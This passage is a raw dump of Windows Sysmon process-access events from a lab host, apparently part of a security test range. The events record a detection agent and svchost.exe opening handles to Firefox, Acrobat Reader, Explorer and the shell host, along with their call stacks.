Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048756Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.409{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048755Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.406{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048754Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.404{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048753Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.403{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048752Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.393{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048751Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.380{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048750Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.376{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048749Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.372{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048748Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.368{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048747Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.365{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048746Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.363{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048745Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.360{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048744Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048743Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048742Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048741Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048740Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048739Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048738Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048737Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048736Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048735Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048734Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048733Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048732Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048731Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048730Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048729Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048728Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048727Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 